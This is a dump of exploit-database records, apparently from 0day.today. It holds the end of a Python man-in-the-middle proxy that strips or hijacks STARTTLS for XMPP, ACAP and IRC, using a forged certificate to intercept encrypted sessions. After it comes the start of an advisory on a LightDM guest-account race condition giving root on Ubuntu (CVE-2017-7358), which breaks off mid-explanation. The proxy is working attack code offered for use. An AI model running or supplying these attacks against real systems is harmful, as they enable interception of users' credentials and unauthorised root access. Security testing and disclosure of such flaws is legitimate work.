starttls\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n start = data.index(\"<starttls\")\r\n end = data.index(\"</starttls>\",start)+len(\"</starttls>\")\r\n starttls_args = data[start:end]\r\n data = data[:start] + data[end:] # strip inbound starttls\r\n if \"required\" in starttls_args:\r\n # do outbound starttls as required by server\r\n session.outbound.sendall(\"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")\r\n logger.debug(\"%s [client] => [server][mangled] %s\"%(session,repr(\"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")))\r\n resp_data = session.outbound.recv_blocked()\r\n if not resp_data.startswith(\"<proceed \"):\r\n raise ProtocolViolationException(\"whoop!? server announced STARTTLS *required* but fails to proceed. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n # do not respond with <proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\r\n #<failure/> or <proceed/>\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n #session.inbound.sendall(\"<success xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\") # fake respone\r\n #data=None\r\n elif any(c in data.lower() for c in (\"</auth>\",\"<query\",\"<iq\",\"<username\")):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"<starttls \" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not resp_data.startswith(\"<proceed \"):\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"</auth>\" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class ACAP:\r\n #rfc2244, rfc2595\r\n _PROTO_ID = 675\r\n _REX_CAP = re.compile(r\"\\(([^\\)]+)\\)\")\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if all(kw in data for kw in (\"ACAP\",\"STARTTLS\")):\r\n features = Vectors.ACAP._REX_CAP.findall(data) # features w/o parentheses\r\n data = ' '.join(\"(%s)\"%f for f in features if not \"STARTTLS\" in f)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \" AUTHENTICATE \" in data: \r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n id = data.split(' ',1)[0].strip()\r\n session.inbound.sendall('%s BAD \"command unknown or arguments invalid\"'%id) # or 580 Can not initiate TLS negotiation\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr('%s BAD \"command unknown or arguments invalid\"'%id)))\r\n data=None\r\n elif \" AUTHENTICATE \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n id = data.split(' ',1)[0].strip()\r\n session.inbound.sendall('%s OK \"Begin TLS negotiation now\"'%id)\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr('%s OK \"Begin TLS negotiation now\"'%id)))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not \" OK \" in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \" AUTHENTICATE \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class IRC:\r\n #rfc2244, rfc2595\r\n _PROTO_ID = 6667\r\n _REX_CAP = re.compile(r\"\\(([^\\)]+)\\)\")\r\n _IDENT_PORT = 113\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if all(kw.lower() in data.lower() for kw in (\" cap \",\" tls\")):\r\n mangled = []\r\n for line in data.split(\"\\n\"):\r\n if all(kw.lower() in line.lower() for kw in (\" cap \",\" tls\")):\r\n # can be CAP LS or CAP ACK/NACK\r\n if \" ack \" in data.lower():\r\n line = line.replace(\"ACK\",\"NAK\").replace(\"ack\",\"nak\")\r\n else: #ls\r\n features = line.split(\" \")\r\n line = ' '.join(f for f in features if not 'tls' in f.lower())\r\n mangled.append(line)\r\n data = \"\\n\".join(mangled)\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return \r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n #elif all(kw.lower() in data.lower() for kw in (\"cap req\",\"tls\")):\r\n # # mangle CAPABILITY REQUEST\r\n # if \":\" in data:\r\n # cmd, caps = data.split(\":\")\r\n # caps = (c for c in caps.split(\" \") if not \"tls\" in c.lower())\r\n # data=\"%s:%s\"%(cmd,' '.join(caps))\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'STARTTLS'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\"%(srv)s 691 %(nickname)s :%(cmd)s\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%(srv)s 691 %(nickname)s :%(cmd)s\\r\\n\"%params)))\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithNotRegistered:\r\n ''' 1) force server wrong state on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'You have not registered'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)))\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripCAPWithNotRegistered:\r\n ''' 1) force server wrong state on client sending CAP LS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"CAP LS\" in data:\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'You have not registered'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%(srv)s 451 %(nickname)s :%(cmd)s\\r\\n\"%params)))\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithSilentDrop:\r\n ''' 1) silently drop starttls command\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \" ident \" in data.lower():\r\n #TODO: proxy ident\r\n pass\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n params = {'srv':'this.server.com',\r\n 'nickname': '*',\r\n 'cmd': 'STARTTLS'\r\n }\r\n # if we're lucky we can extract the username from a prev. server line\r\n prev_response = session.outbound.recvbuf.strip()\r\n if prev_response: \r\n fields = prev_response.split(\" \")\r\n try:\r\n params['srv'] = fields[0]\r\n params['nickname'] = fields[2]\r\n except IndexError:\r\n pass\r\n session.inbound.sendall(\":%(srv)s 670 %(nickname)s :STARTTLS successful, go ahead with TLS handshake\\r\\n\"%params)\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\":%(srv)s 670 %(nickname)s :STARTTLS successful, go ahead with TLS handshake\\r\\n\"%params)))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not \" 670 \" in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif any(kw.lower() in data.lower() for kw in ('authenticate ','privmsg ', 'protoctl ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n \r\nclass RewriteDispatcher(object):\r\n def __init__(self, generic_tls_intercept=False):\r\n self.vectors = {} # proto:[vectors]\r\n self.results = [] # [ {session,client_ip,mangle,result}, }\r\n self.session_to_mangle = {} # session:mangle\r\n self.generic_tls_intercept = generic_tls_intercept\r\n \r\n def __repr__(self):\r\n return \"<RewriteDispatcher ssl/tls_intercept=%s vectors=%s>\"%(self.generic_tls_intercept, repr(self.vectors))\r\n \r\n def get_results(self):\r\n return self.results\r\n \r\n def get_results_by_clients(self):\r\n results = {} #client:{mangle:result}\r\n for r in self.get_results():\r\n client = r['client']\r\n results.setdefault(client,[])\r\n mangle = r['mangle']\r\n result = r['result']\r\n results[client].append((mangle,result))\r\n return results\r\n \r\n def get_result(self, session):\r\n for r in self.get_results():\r\n if r['session']==session:\r\n return r\r\n return None\r\n \r\n def set_result(self, session, value):\r\n r = self.get_result(session)\r\n r['result'] = value\r\n \r\n def add(self, proto, attack):\r\n self.vectors.setdefault(proto,set([]))\r\n self.vectors[proto].add(attack)\r\n \r\n def get_mangle(self, session):\r\n ''' smart select mangle\r\n return same mangle for same session\r\n return different for different session\r\n try to use all mangles for same client-ip\r\n '''\r\n # 1) session already has a mangle associated to it\r\n mangle = self.session_to_mangle.get(session)\r\n if mangle:\r\n return mangle\r\n # 2) pick new mangle (round-robin) per client\r\n # \r\n client_ip = session.inbound.peer[0]\r\n client_mangle_history = [r for r in self.get_results() if r['client']==client_ip]\r\n \r\n all_mangles = list(self.get_mangles(session.protocol.protocol_id))\r\n if not all_mangles:\r\n return None\r\n new_index = 0\r\n if client_mangle_history:\r\n previous_result = client_mangle_history[-1]\r\n new_index = (all_mangles.index(previous_result['mangle'])+1) % len(all_mangles)\r\n mangle = all_mangles[new_index]\r\n \r\n self.results.append({'client':client_ip,\r\n 'session':session,\r\n 'mangle':mangle,\r\n 'result':None}) \r\n \r\n #mangle = iter(self.get_mangles(session.protocol.protocol_id)).next()\r\n logger.debug(\"<RewriteDispatcher - changed mangle: %s new: %s>\"%(mangle,\"False\" if len(client_mangle_history)>len(all_mangles) else \"True\"))\r\n self.session_to_mangle[session] = mangle\r\n return mangle\r\n \r\n def get_mangles(self, proto):\r\n m = self.vectors.get(proto,set([]))\r\n m.update(self.vectors.get(None,[]))\r\n return m\r\n \r\n def mangle_server_data(self, session, data):\r\n data_orig = data\r\n logger.debug(\"%s [client] <= [server] %s\"%(session,repr(data)))\r\n if self.get_mangle(session):\r\n data = self.get_mangle(session).mangle_server_data(session, data, self)\r\n if data!=data_orig:\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(data)))\r\n return data\r\n \r\n def mangle_client_data(self, session, data):\r\n data_orig = data\r\n logger.debug(\"%s [client] => [server] %s\"%(session,repr(data)))\r\n if self.get_mangle(session):\r\n #TODO: just use the first one for now\r\n data = self.get_mangle(session).mangle_client_data(session, data, self)\r\n if data!=data_orig:\r\n logger.debug(\"%s [client] => [server][mangled] %s\"%(session,repr(data)))\r\n return data\r\n \r\n def on_recv_peek(self, s_in, session):\r\n if self.generic_tls_intercept:\r\n # forced by cmdline-option\r\n return Vectors.GENERIC.Intercept.on_recv_peek(session, s_in)\r\n elif hasattr(self.get_mangle(session), \"on_recv_peek\"):\r\n return self.get_mangle(session).on_recv_peek(session, s_in)\r\n \r\ndef main():\r\n from optparse import OptionParser\r\n ret = 0\r\n usage = \"\"\"usage: %prog [options]\r\n \r\n example: %prog --listen 0.0.0.0:25 --remote mail.server.tld:25 \r\n \"\"\"\r\n parser = OptionParser(usage=usage)\r\n parser.add_option(\"-q\", \"--quiet\",\r\n action=\"store_false\", dest=\"verbose\", default=True,\r\n help=\"be quiet [default: %default]\")\r\n parser.add_option(\"-l\", \"--listen\", dest=\"listen\", help=\"listen ip:port [default: 0.0.0.0:<remote_port>]\")\r\n parser.add_option(\"-r\", \"--remote\", dest=\"remote\", help=\"remote target ip:port to forward sessions to\")\r\n parser.add_option(\"-k\", \"--key\", dest=\"key\", default=\"server.pem\", help=\"SSL Certificate and Private key file to use, PEM format assumed [default: %default]\")\r\n parser.add_option(\"-s\", \"--generic-ssl-intercept\",\r\n action=\"store_true\", dest=\"generic_tls_intercept\", default=False,\r\n help=\"dynamically intercept SSL/TLS\")\r\n parser.add_option(\"-b\", \"--bufsiz\", dest=\"buffer_size\", type=\"int\", default=4096)\r\n \r\n all_vectors = []\r\n for proto in (v for v in dir(Vectors) if not v.startswith(\"_\")):\r\n for test in (v for v in dir(getattr(Vectors,proto)) if not v.startswith(\"_\")):\r\n all_vectors.append(\"%s.%s\"%(proto,test))\r\n parser.add_option(\"-x\", \"--vectors\",\r\n default=\"ALL\",\r\n help=\"Comma separated list of vectors. Use 'ALL' (default) to select all vectors, 'NONE' for tcp/ssl proxy mode. Available vectors: \"+\", \".join(all_vectors)+\"\"\r\n \" [default: %default]\")\r\n # parse args\r\n (options, args) = parser.parse_args()\r\n # normalize args\r\n if not options.verbose:\r\n logger.setLevel(logging.INFO)\r\n if not options.remote:\r\n parser.error(\"mandatory option: remote\")\r\n if \":\" not in options.remote and \":\" in options.listen:\r\n # no port in remote, but there is one in listen. use this one\r\n options.remote = (options.remote.strip(), int(options.listen.strip().split(\":\")[1]))\r\n logger.warning(\"no remote port specified - falling back to %s:%d (listen port)\"%options.remote)\r\n elif \":\" in options.remote:\r\n options.remote = options.remote.strip().split(\":\")\r\n options.remote = (options.remote[0], int(options.remote[1]))\r\n else:\r\n parser.error(\"neither remote nor listen is in the format <host>:<port>\")\r\n if not options.listen:\r\n logger.warning(\"no listen port specified - falling back to 0.0.0.0:%d (remote port)\"%options.remote[1])\r\n options.listen = (\"0.0.0.0\",options.remote[1])\r\n elif \":\" in options.listen:\r\n options.listen = options.listen.strip().split(\":\")\r\n options.listen = (options.listen[0], int(options.listen[1]))\r\n else:\r\n options.listen = (options.listen.strip(), options.remote[1])\r\n logger.warning(\"no listen port specified - falling back to %s:%d (remote port)\"%options.listen)\r\n options.vectors = [o.strip() for o in options.vectors.strip().split(\",\")]\r\n if 'ALL' in (v.upper() for v in options.vectors):\r\n options.vectors = all_vectors\r\n elif 'NONE' in (v.upper() for v in options.vectors):\r\n options.vectors = []\r\n Vectors._TLS_CERTFILE = Vectors._TLS_KEYFILE = options.key\r\n \r\n # ---- start up engines ----\r\n prx = ProxyServer(listen=options.listen, target=options.remote, \r\n buffer_size=options.buffer_size, delay=0.00001)\r\n logger.info(\"%s ready.\"%prx)\r\n rewrite = RewriteDispatcher(generic_tls_intercept=options.generic_tls_intercept)\r\n \r\n for classname in options.vectors:\r\n try:\r\n proto, vector = classname.split('.',1)\r\n cls_proto = getattr(globals().get(\"Vectors\"),proto)\r\n cls_vector = getattr(cls_proto, vector)\r\n rewrite.add(cls_proto._PROTO_ID, cls_vector)\r\n logger.debug(\"* added vector (port:%-5s, proto:%8s): %s\"%(cls_proto._PROTO_ID, proto, repr(cls_vector)))\r\n except Exception, e:\r\n logger.error(\"* error - failed to add: %s\"%classname)\r\n parser.error(\"invalid vector: %s\"%classname)\r\n \r\n logging.info(repr(rewrite))\r\n prx.set_callback(\"mangle_server_data\", rewrite.mangle_server_data)\r\n prx.set_callback(\"mangle_client_data\", rewrite.mangle_client_data)\r\n prx.set_callback(\"on_recv_peek\", rewrite.on_recv_peek)\r\n try:\r\n prx.main_loop()\r\n except KeyboardInterrupt:\r\n logger.warning( \"Ctrl C - Stopping server\")\r\n ret+=1\r\n \r\n logger.info(\" -- audit results --\")\r\n for client,resultlist in rewrite.get_results_by_clients().iteritems():\r\n logger.info(\"[*] client: %s\"%client)\r\n for mangle, result in resultlist:\r\n logger.info(\" [%-11s] %s\"%(\"Vulnerable!\" if result else \" \",repr(mangle)))\r\n \r\n sys.exit(ret)\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-04-05] #", "sourceHref": "https://0day.today/exploit/29438", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-02-09T03:28:20", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2017-04-25T00:00:00", "published": "2017-04-25T00:00:00", "href": "https://0day.today/exploit/description/27673", "id": "1337DAY-ID-27673", "title": "Ubuntu 16.10 / 16.04 LTS - LightDM Guest Account Local Privilege Escalation Exploit", "type": "zdt", "sourceData": "Source: https://blogs.securiteam.com/index.php/archives/3134\r\n \r\nVulnerability Summary\r\nThe following advisory describes a local privilege escalation via LightDM\r\nfound in Ubuntu versions 16.10 / 16.04 LTS.\r\n \r\nUbuntu is an open source software platform that runs everywhere from IoT\r\ndevices, the smartphone, the tablet and the PC to the server and the\r\ncloud. LightDM is an X display manager that aims to be lightweight, fast,\r\nextensible and multi-desktop. It uses various front-ends to draw login\r\ninterfaces, also called Greeters.\r\n \r\n \r\nCredit\r\nAn independent security researcher, G. Geshev (@munmap), has reported this\r\nvulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n \r\n \r\nVendor Responses\r\nThe vendor has released a patch to address this issue.\r\nFor more information: https://www.ubuntu.com/usn/usn-3255-1/\r\n \r\n \r\nCVE Details\r\nCVE-2017-7358 <https://nvd.nist.gov/vuln/detail/CVE-2017-7358>\r\n \r\n \r\nVulnerability Details\r\nThe vulnerability is found in *LightDM*, which is the Ubuntu\u2019s default\r\ndesktop manager, more specifically in the guest login feature. By default\r\n*LightDM* allows you to log into a session as a temporary user. This is\r\nimplemented in a script called \u2018*guest-account*\u2018.\r\n \r\n@ubuntu:~$ ls -l /usr/sbin/guest-account\r\n-rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account\r\n \r\n@ubuntu:~$ dpkg -S /usr/sbin/guest-account\r\nlightdm: /usr/sbin/guest-account\r\n \r\n@ubuntu:~$ dpkg -s lightdm\r\nPackage: lightdm\r\nStatus: install ok installed\r\nPriority: optional\r\nSection: x11\r\nInstalled-Size: 672\r\nMaintainer: Robert Ancell <[email\u00a0protected]>\r\nArchitecture: amd64\r\nVersion: 1.19.5-0ubuntu1\r\nProvides: x-display-manager\r\nDepends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>=\r\n1.7.0), libglib2.0-0 (>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6\r\n, adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14),\r\nlibpam-modules, plymouth (>= 0.8.8-0ubuntu18)\r\nPre-Depends: dpkg (>= 1.15.7.2)\r\nRecommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde-\r\ngreeter\r\nSuggests: bindfs\r\nConflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0\r\nConffiles:\r\n/etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf\r\n/etc/apparmor.d/abstractions/lightdm_chromium-browser\r\ne1195e34922a67fa219b8b95eaf9c305\r\n/etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb\r\n/etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf\r\nb76b6b45d7f7ff533c51d7fc02be32f4\r\n/etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188\r\n/etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e\r\n/etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e\r\n/etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9\r\n/etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22\r\n/etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf\r\n/etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9\r\nDescription: Display Manager\r\nLightDM is a X display manager that:\r\n * Has a lightweight codebase\r\n * Is standards compliant (PAM, ConsoleKit, etc)\r\n * Has a well defined interface between the server and user interface\r\n * Cross-desktop (greeters can be written in any toolkit)\r\nHomepage: https://launchpad.net/lightdm\r\n \r\n@ubuntu:~$\r\n \r\nThe script runs as root when you view the login screen, also known as a\r\ngreeter, to log in as a guest. Ubuntu\u2019s default greeter is Unity Greeter.\r\n \r\n \r\n*Vulnerable code*\r\n \r\nThe vulnerable function is \u2018*add_account*\u2018.\r\n \r\n35 temp_home=$(mktemp -td guest-XXXXXX)\r\n36 GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]')\r\n37 GUEST_USER=${GUEST_HOME#/tmp/}\r\n38 [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME}\r\n \r\nThe guest folder gets created using \u2018mktemp\u2019 on line 35. The attacker can\r\nuse \u2018*inotify*\u2018 to monitor \u2018*/tmp*\u2018 for the creation of this folder.\r\n \r\nThe folder name will likely contain both upper and lower case letters. Once\r\nthis folder is created, we grab the folder name and quickly and create the\r\nequivalent folder with all letters lower case.\r\n \r\nIf we manage to race the \u2018*mv*\u2018 command on line 38, we end up with the\r\nnewly created home for the guest user inside the folder we own.\r\n \r\nOnce we have the guest home under our control, we rename it and replace it\r\nwith a *symbolic link* to a folder we want to take over. The code below\r\nwill then add the new user to the OS. The user\u2019s home folder will already\r\npoint to the folder we want to take over, for example \u2018*/usr/local/sbin*\u2018.\r\n \r\n68 useradd --system --home-dir ${GUEST_HOME} --comment $(gettext \"Guest\")\r\n--user-group --shell /bin/bash ${GUEST_USER} || {\r\n69 rm -rf ${GUEST_HOME}\r\n70 exit 1\r\n71 }\r\n \r\nThe attacker can grab the newly created user\u2019s ID and monitor \u2018\r\n*/usr/local/sbin*\u2018 for ownership changes. The ownership will be changed by\r\nthe following \u2018*mount*\u2018.\r\n \r\n78 mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || {\r\n79 rm -rf ${GUEST_HOME}\r\n80 exit 1\r\n81 }\r\n \r\nWe will remove the symbolic link and create a folder with the same name \u2013\r\nto let the guest user to log in. While the guest is logging in, his path\r\nfor finding executable files will include \u2018*bin*\u2018 under his home folder.\r\n \r\nThat\u2019s why we create a new symbolic link to point his \u2018*bin*\u2018 into a folder\r\nwe control. This way we can force the user to execute our own code under\r\nhis user ID. We use this to log out the guest user from his session which\r\nis where we can gain root access.\r\n \r\nThe logout code will first execute the following code:\r\n \r\n156 PWENT=$(getent passwd ${GUEST_USER}) || {\r\n157 echo \"Error: invalid user ${GUEST_USER}\"\r\n158 exit 1\r\n159 }\r\n \r\nThis code will be executed as the owner of the script, 